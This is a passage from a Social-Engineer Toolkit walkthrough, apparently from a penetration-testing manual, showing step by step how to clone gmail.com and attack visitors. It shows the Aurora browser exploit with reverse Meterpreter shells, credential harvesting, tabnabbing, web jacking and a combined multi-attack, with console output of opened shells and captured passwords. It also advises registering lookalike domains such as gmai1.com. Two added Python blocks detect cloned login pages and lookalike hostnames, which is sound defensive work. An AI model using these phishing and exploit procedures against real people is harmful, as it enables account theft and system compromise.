[*] Started reverse handler on 172.16.32.129:8080
AutoRunScript => migrate -f
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:8081
[*] Starting the payload handler...
In this attack, we've set up our scenario to clone https://gmail.com and use the reverse meterpreter attack vector on port 443. We've used the backdoored executable to hopefully bypass anti-virus and set up Metasploit to handle the reverse connections. If you wanted to utilize an email with this attack vector, you could edit config/set_config and change WEBATTACK_EMAIL=OFF to WEBATTACK_EMAIL=ON. When you get a victim to click a link or coax him to your website, it will look something like this:

As soon as the victim clicks run, you are presented with a meterpreter shell, and the victim is redirected back to the original Google site, completely unaware that they have been compromised.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at Thu Sep 09 10:06:57 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the ability to clone the website and utilize browser-based exploits. Let's take a quick look at delivering a browser exploit through SET.
Select from the menu:

   1. Spear-Phishing Attack Vectors
   2. Website Attack Vectors
   3. Infectious Media Generator
   4. Create a Payload and Listener
   5. Mass Mailer Attack
   6. Teensy USB HID Attack Vector
   7. SMS Spoofing Attack Vector
   8. Update the Metasploit Framework
   9. Update the Social-Engineer Toolkit
  10. Help, Credits, and About
  11. Exit the Social-Engineer Toolkit

Enter your choice: 2
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its to slow/fast.

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

   1. The Java Applet Attack Method
   2. The Metasploit Browser Exploit Method
   3. Credential Harvester Attack Method
   4. Tabnabbing Attack Method
   5. Man Left in the Middle Attack Method
   6. Web Jacking Attack Method
   7. Multi-Attack Web Method
   8. Return to the previous menu

Enter your choice (press enter for default): 2
The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

   1. Web Templates
   2. Site Cloner
   3. Custom Import
   4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
Enter the browser exploit you would like to use

   1. Internet Explorer CSS Tags Memory Corruption
   2. Sun Java Runtime New Plugin docbase Buffer Overflow
   3. Microsoft Windows WebDAV Application DLL Hijacker
   4. Adobe Shockwave rcsL Memory Corruption Exploit
   5. Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   6. Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
   7. Microsoft Help Center XSS and Command Execution (MS10-042)
   8. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
   9. Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
  10. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
  11. Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
  12. Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
  13. Microsoft Internet Explorer isComponentInstalled Overflow
  14. Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
  15. Microsoft Internet Explorer Unsafe Scripting Misconfiguration
  16. FireFox 3.5 escape Return Value Memory Corruption
  17. Metasploit Browser Autopwn (USE AT OWN RISK!)

Enter your choice (1-17) (enter for default): 7
What payload do you want to generate:

  Name:                                      Description:

   1. Windows Shell Reverse_TCP              Spawn a command shell on victim and send back to attacker.
   2. Windows Reverse_TCP Meterpreter        Spawn a meterpreter shell on victim and send back to attacker.
   3. Windows Reverse_TCP VNC DLL            Spawn a VNC server on victim and send back to attacker.
   4. Windows Bind Shell                     Execute payload and create an accepting port on remote system.
   5. Windows Bind Shell X64                 Windows x64 Command Shell, Bind TCP Inline
   6. Windows Shell Reverse_TCP X64          Windows X64 Command Shell, Reverse TCP Inline
   7. Windows Meterpreter Reverse_TCP X64    Connect back to the attacker (Windows x64), Meterpreter
   8. Windows Meterpreter Egress Buster      Spawn a meterpreter shell and find a port home via multiple ports
   9. Download/Run your Own Executable       Downloads an executable and runs it

Enter choice (example 1-8) (Enter for default):
Enter the port to use for the reverse (enter for default):
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
[Metasploit ASCII-art banner]
       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use windows/browser/ms10_002_aurora
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.
Once the victim browses the website, it will look exactly like the site you cloned and then compromise the system.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at Thu Sep 09 10:14:22 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
The credential harvester attack method is used when you don't specifically want to get a shell but instead perform phishing attacks in order to obtain usernames and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.
   1. The Java Applet Attack Method
   2. The Metasploit Browser Exploit Method
   3. Credential Harvester Attack Method
   4. Tabnabbing Attack Method
   5. Man Left in the Middle Attack Method
   6. Web Jacking Attack Method
   7. Multi-Attack Web Method
   8. Return to the previous menu

Enter your choice (press enter for default): 3
The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

   1. Web Templates
   2. Site Cloner
   3. Custom Import
   4. Return to main menu

Enter number (1-4): 2
Email harvester will allow you to utilize the clone capabilities within SET to harvest credentials or parameters from a website as well as place them into a report.

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message.
[*] Press {return} to continue.

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Once the victim clicks the link, they will be presented with an exact replica of gmail.com and hopefully be enticed to enter their username and password into the form fields. As soon as the victim hits sign in, we are presented with the credentials and the victim is redirected back to the legitimate site.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
172.16.32.131 - - [09/Sep/2010 10:12:55] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7536764660264620804
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=nwAWNiTEqGc
POSSIBLE USERNAME FIELD FOUND: Email=thisismyuser
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
Also note that when you're finished, hit CONTROL-C and a report will be generated for you in two formats. The first is an HTML based report; the other is XML, if you need to parse the information into another tool.
^C[*] File exported to reports/2010-09-09 10:14:30.152435.html for your reading pleasure...
[*] File in XML format exported to reports/2010-09-09 10:14:30.152435.xml for your reading pleasure...

Press {return} to return to the menu.^C
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its to slow/fast.

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

   1. The Java Applet Attack Method
   2. The Metasploit Browser Exploit Method
   3. Credential Harvester Attack Method
   4. Tabnabbing Attack Method
   5. Man Left in the Middle Attack Method
   6. Web Jacking Attack Method
   7. Multi-Attack Web Method
   8. Return to the previous menu

Enter your choice (press enter for default): ^C
Thank you for shopping at the Social-Engineer Toolkit.

Hack the Gibson...

root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.
2010-09-09 10:14:30.152435.html  2010-09-09 10:14:30.152435.xml
root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.html
The tabnabbing attack method is used when a victim has multiple tabs open. When the user clicks the link, the victim will be presented with a "Please wait while the page loads" message. When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are entered, they are harvested and the user is redirected back to the original website.
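The credential harvester and tabnabbing sections above each leave a tell in the page itself: a password form served from, or posting to, a host that is not the legitimate login host, and script that reacts to the tab losing focus and rewrites the document. The following is an added example written for this manual, not SET's own code; it checks both tells statically on a captured page. The trusted-host list, the sample pages and the address 172.16.32.129 used in them are constructed for the example.

```python
"""Static indicators of a cloned login page (added example, not SET code).

find_indicators() reports:
  password-form-on-untrusted-host  a password form served from a host that is
                                   not a legitimate login host (site-cloner case)
  password-post-leaves-origin      a password form whose action posts to another
                                   host (compromised-site / injected-script case)
  focus-loss-page-rewrite          script that fires on blur/visibilitychange and
                                   navigates or rewrites the page (tabnabbing case)
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _PageScanner(HTMLParser):
    """Collect password-bearing forms and every piece of script text
    (inline <script> bodies and on* event-handler attributes)."""

    def __init__(self):
        super().__init__()
        self.forms = []      # each: {"action": str, "has_password": bool}
        self.scripts = []    # one entry per <script> body or handler attribute
        self._form = None
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name, value in attrs.items():
            if name.startswith("on") and value:      # onblur="..." and friends
                self.scripts.append(name + ":" + value)
        if tag == "form":
            self._form = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._form["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self.scripts.append("".join(self._buf))
            self._buf = []
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


# Script that listens for the tab losing focus ...
_FOCUS_LOSS = re.compile(r"\b(onblur|blur|visibilitychange|pagehide)\b", re.I)
# ... and then navigates or rewrites the document.
_REWRITE = re.compile(r"location(\.href)?\s*=|location\.replace\s*\(|document\.write\s*\(|innerHTML\s*=", re.I)


def find_indicators(page_url, html, trusted_login_hosts):
    """Return [(indicator, detail), ...] for one captured page. page_url is the
    address the page was served from; trusted_login_hosts are the hosts that
    legitimately receive credentials for the service the page imitates."""
    scanner = _PageScanner()
    scanner.feed(html)
    scanner.close()
    page_host = (urlparse(page_url).hostname or "").lower()
    trusted = {h.lower() for h in trusted_login_hosts}
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        if page_host not in trusted:
            findings.append(("password-form-on-untrusted-host", page_host))
        action_host = (urlparse(urljoin(page_url, form["action"])).hostname or "").lower()
        if action_host != page_host:
            findings.append(("password-post-leaves-origin", action_host))
    for body in scanner.scripts:
        if _FOCUS_LOSS.search(body) and _REWRITE.search(body):
            findings.append(("focus-loss-page-rewrite", body.strip()[:60]))
    return findings


# Constructed samples: a legitimate login page, a clone of it served from the
# attacker's address, the clone with a focus-loss rewrite added, and the
# legitimate page with its form made to post elsewhere.
TRUSTED = {"accounts.google.com"}
LEGIT_URL = "https://accounts.google.com/ServiceLogin"
LEGIT_HTML = """<html><body>
<form action="https://accounts.google.com/ServiceLoginAuth" method="post">
  <input name="Email"><input type="password" name="Passwd">
  <input type="submit" name="signIn" value="Sign in">
</form></body></html>"""
CLONE_URL = "http://172.16.32.129/"
CLONE_HTML = LEGIT_HTML.replace("https://accounts.google.com/ServiceLoginAuth", "index.html")
TABNAB_HTML = CLONE_HTML + '<script>window.onblur = function () { location.replace("/index2.html"); };</script>'
INJECTED_HTML = LEGIT_HTML.replace("https://accounts.google.com/ServiceLoginAuth", "http://172.16.32.129/")

if __name__ == "__main__":
    for label, url, page in (("legit", LEGIT_URL, LEGIT_HTML), ("clone", CLONE_URL, CLONE_HTML),
                             ("tabnab", CLONE_URL, TABNAB_HTML), ("injected", LEGIT_URL, INJECTED_HTML)):
        print(label, find_indicators(url, page, TRUSTED))
```

The host comparison is the important part: a clone keeps the original's look and field names (Email, Passwd, signIn, as in the harvester output later in this section), so field names tell a defender nothing; where the page lives and where the POST goes is what separates it from the real login.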
   1. The Java Applet Attack Method
   2. The Metasploit Browser Exploit Method
   3. Credential Harvester Attack Method
   4. Tabnabbing Attack Method
   5. Man Left in the Middle Attack Method
   6. Web Jacking Attack Method
   7. Multi-Attack Web Method
   8. Return to the previous menu

Enter your choice (press enter for default): 4
The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

   1. Web Templates
   2. Site Cloner
   3. Custom Import
   4. Return to main menu

Enter number (1-4): 2
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message.
[*] Press {return} to continue.

[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
The victim is presented with a webpage that says please wait while the page loads. When the victim switches tabs, the website is rewritten; the victim then enters the credentials and they are harvested.
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-9060819085229816070
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=00-69E-Tt5g
POSSIBLE USERNAME FIELD FOUND: Email=sfdsfsd
POSSIBLE PASSWORD FIELD FOUND: Passwd=afds
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
The man left in the middle attack utilizes HTTP REFERERs on an already compromised site or XSS vulnerability to pass the credentials back to the HTTP server. In this instance, if you find an XSS vulnerability and send the URL to the victim and they click, the website will operate 100 percent; however, when they go to log into the system, it will pass the credentials back to the attacker and harvest the credentials.
   1. The Java Applet Attack Method
   2. The Metasploit Browser Exploit Method
   3. Credential Harvester Attack Method
   4. Tabnabbing Attack Method
   5. Man Left in the Middle Attack Method
   6. Web Jacking Attack Method
   7. Multi-Attack Web Method
   8. Return to the previous menu

Enter your choice (press enter for default): 5
***************************************************
Web Server Launched. Welcome to the SET MLTM.
***************************************************

Man Left in the Middle Attack brought to you by:
Kyle Osborn - kyle@kyleosborn.com

Starting server on 0.0.0.0:80...
[*] Server has started
The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature in version 0.7.1. When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So, for example, if you're cloning gmail.com, the URL when hovered over would be gmail.com. When the user clicks the moved link, gmail opens and then is quickly replaced with your malicious webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.
   1. The Java Applet Attack Method
   2. The Metasploit Browser Exploit Method
   3. Credential Harvester Attack Method
   4. Tabnabbing Attack Method
   5. Man Left in the Middle Attack Method
   6. Web Jacking Attack Method
   7. Multi-Attack Web Method
   8. Return to the previous menu

Enter your choice (press enter for default): 6
The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

   1. Web Templates
   2. Site Cloner
   3. Custom Import
   4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.

[*] I have read the above message.
[*] Press {return} to continue.

[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
When the victim goes to the site, he/she will notice the link below; notice the bottom left URL, it's gmail.com.
When the victim clicks the link, he is presented with the following webpage:

If you notice the URL bar, we are at our malicious web server. In cases with social engineering, you want to make it believable; using an IP address is generally a bad idea. My recommendation is, if you're doing a penetration test, register a name that's similar to the victim's; for gmail you could do gmai1.com (notice the 1), something similar that can mislead the user into thinking it's the legitimate site. Most of the time they won't even notice the IP, but it's just another way to ensure it goes on without a hitch.

Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials now.
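The presentation tricks discussed above (a bare IP address in the URL bar, a lookalike name such as gmai1.com, and a brand name placed in front of an unrelated domain) are exactly what a defender triaging proxy logs or newly registered domains looks for. The following is an added example written for this manual, not SET's own code; the protected-domain list and the sample hosts are constructed, and the confusable-character table is a small illustrative subset rather than a complete one.

```python
"""Classify hostnames that imitate a protected login domain (added example,
not SET code). classify_host() returns one of:
  trusted                    the protected domain or a subdomain of it
  ip-literal                 a bare IP address instead of a name
  lookalike:<brand>          within one edit of the brand after folding
                             confusable characters (gmai1.com, grnail.com)
  brand-in-subdomain:<brand> the brand used as a leading label of another
                             domain (gmail.com.account-verify.net)
  unknown                    none of the above
"""
import ipaddress

# Single characters commonly substituted for letters in lookalike names
# (illustrative subset, constructed for this example).
_CONFUSABLES = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s",
                              "7": "t", "8": "b", "|": "l"})
# Letter pairs that render much like a single letter.
_PAIRS = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def normalize(host):
    """Fold a hostname to the letters a reader would perceive."""
    host = host.lower().rstrip(".")
    host = host.translate(_CONFUSABLES)
    for pair, single in _PAIRS:
        host = host.replace(pair, single)
    return host


def edit_distance(a, b):
    """Levenshtein distance (insert / delete / substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host, protected, max_distance=1):
    """Verdict for one hostname against the list of protected domains."""
    host = host.lower().rstrip(".").split(":")[0]   # drop trailing dot or port
    try:
        ipaddress.ip_address(host)
        return "ip-literal"
    except ValueError:
        pass
    brands = [b.lower() for b in protected]
    for brand in brands:
        if host == brand or host.endswith("." + brand):
            return "trusted"
    folded = normalize(host)
    for brand in brands:
        fb = normalize(brand)
        if folded.startswith(fb + ".") or ("." + fb + ".") in folded:
            return "brand-in-subdomain:" + brand
        if edit_distance(folded, fb) <= max_distance:
            return "lookalike:" + brand
    return "unknown"


def triage(hosts, protected):
    """Keep only the hosts that deserve a second look (not trusted, not unknown)."""
    verdicts = {h: classify_host(h, protected) for h in hosts}
    return {h: v for h, v in verdicts.items() if v not in ("trusted", "unknown")}


# Constructed inputs: the domains a defender protects and hosts as they might
# appear in a proxy log or a new-registration feed.
PROTECTED = ["gmail.com", "google.com"]
SAMPLE_HOSTS = ["172.16.32.129", "gmai1.com", "mail.google.com",
                "gmail.com.account-verify.net", "grnail.com", "example.org"]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_HOSTS, PROTECTED).items():
        print(f"{host:32} {verdict}")
```

The folding step is what catches gmai1.com: after the digit 1 is read as the letter l the two names are identical, so the edit distance is zero. Raising max_distance widens the net but also pulls in unrelated short domains, so it is best kept at one and paired with a registered-domain allow-list.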
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
172.16.32.131 - - [09/Sep/2010 12:15:13] "GET / HTTP/1.1" 200 -
172.16.32.131 - - [09/Sep/2010 12:15:56] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7017428156907423605
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=0JsVTaj70sk
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
The multi-attack web vector is new to 0.7.1 and will allow you to specify multiple web attack methods in order to perform a single attack. In some scenarios, the Java Applet may fail; however, an Internet Explorer exploit would be successful. Or maybe the Java Applet and the Internet Explorer exploit fail and the credential harvester is successful. The multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link, he will be targeted by each of the attack vectors you specify. One thing to note with the attack vector is you can't utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack. Based on the attack vectors, they shouldn't be combined anyways.

Let's take a look at the multi attack vector. In this scenario I'm going to turn on the Java Applet attack, Metasploit Client-Side exploit, and the Web Jacking attack. When the victim browses the site, he/she will need to click on the link and will be bombarded with credential harvester, Metasploit exploits, and the java applet attack. I'm going to intentionally select an Internet Explorer 7 exploit and browse utilizing IE6 just to demonstrate that if one fails, we have other methods.
   1. The Java Applet Attack Method
   2. The Metasploit Browser Exploit Method
   3. Credential Harvester Attack Method
   4. Tabnabbing Attack Method
   5. Man Left in the Middle Attack Method
   6. Web Jacking Attack Method
   7. Multi-Attack Web Method
   8. Return to the previous menu

Enter your choice (press enter for default): 7
The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

   1. Web Templates
   2. Site Cloner
   3. Custom Import
   4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]

The multi attack vector utilizes each combination of attacks and allow the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

   1. The Java Applet Attack Method (OFF)
   2. The Metasploit Browser Exploit Method (OFF)
   3. Credential Harvester Attack Method (OFF)
   4. Tabnabbing Attack Method (OFF)
   5. Man Left in the Middle Attack Method (OFF)
   6. Web Jacking Attack Method (OFF)
   7. Use them all - A.K.A. 'Tactical Nuke'
   8. I'm finished and want proceed with the attack.
   9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 1

Turning the Java Applet Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]

The multi attack vector utilizes each combination of attacks and allow the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

   1. The Java Applet Attack Method (ON)
   2. The Metasploit Browser Exploit Method (OFF)
   3. Credential Harvester Attack Method (OFF)
   4. Tabnabbing Attack Method (OFF)
   5. Man Left in the Middle Attack Method (OFF)
   6. Web Jacking Attack Method (OFF)
   7. Use them all - A.K.A. 'Tactical Nuke'
   8. I'm finished and want proceed with the attack.
   9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 2

Turning the Metasploit Client Side Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]

The multi attack vector utilizes each combination of attacks and allow the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

   1. The Java Applet Attack Method (ON)
   2. The Metasploit Browser Exploit Method (ON)
   3. Credential Harvester Attack Method (OFF)
   4. Tabnabbing Attack Method (OFF)
   5. Man Left in the Middle Attack Method (OFF)
   6. Web Jacking Attack Method (OFF)
   7. Use them all - A.K.A. 'Tactical Nuke'
   8. I'm finished and want proceed with the attack.
   9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch): 6

Turning the Web Jacking Attack Vector to ON
Option added. Press {return} to add or prepare your next attack.
[*************************************************************]
Multi-Attack Web Attack Vector
[*************************************************************]

The multi attack vector utilizes each combination of attacks and allow the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

   1. The Java Applet Attack Method (ON)
   2. The Metasploit Browser Exploit Method (ON)
   3. Credential Harvester Attack Method (ON)
   4. Tabnabbing Attack Method (OFF)
   5. Man Left in the Middle Attack Method (OFF)
   6. Web Jacking Attack Method (ON)
   7. Use them all - A.K.A. 'Tactical Nuke'
   8. I'm finished and want proceed with the attack.
   9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch):
Alternatively, you can use the Tactical Nuke option (option 7), which enables all of the attack vectors automatically for you. In this example you can see the flags change: the Java Applet, Metasploit Browser Exploit, Credential Harvester, and Web Jacking attack methods have all been enabled. To proceed, hit enter or use option 8.

Enter your choice one at a time (hit 8 or enter to launch):
What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
